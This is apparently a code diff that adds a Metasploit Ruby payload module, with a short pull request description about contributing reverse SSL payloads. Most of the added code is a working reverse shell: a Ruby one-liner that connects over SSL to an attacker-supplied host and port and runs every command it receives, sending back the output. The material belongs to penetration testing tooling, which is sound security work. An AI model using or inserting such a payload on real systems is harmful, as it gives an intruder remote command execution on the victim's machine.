+			'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+			'Author'      => 'RageLtMan',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'ruby',
+			'Arch'        => ARCH_RUBY,
+			'Handler'     => Msf::Handler::ReverseTcpSsl,
+			'Session'     => Msf::Sessions::CommandShell,
+			'PayloadType' => 'ruby',
+			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+		))
+	end
+
+	def generate
+		rbs = prepends(ruby_string)
+		vprint_good rbs
+		return rbs
+	end
+
+	def ruby_string
+		lhost = datastore['LHOST']
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end"
+		return rbs
+	end
+end


### PR DESCRIPTION
As discussed in IRC, this PR replaces #1431 and provides the reverse SSL payloads from the SV repository.

I took a look at the current rev_perl shells and they look the same - still using fork. Please highlight anything you'd like me to change about the payload and i'll be glad to amend as needed. 

Thanks for getting back to this issue, its much appreciated.
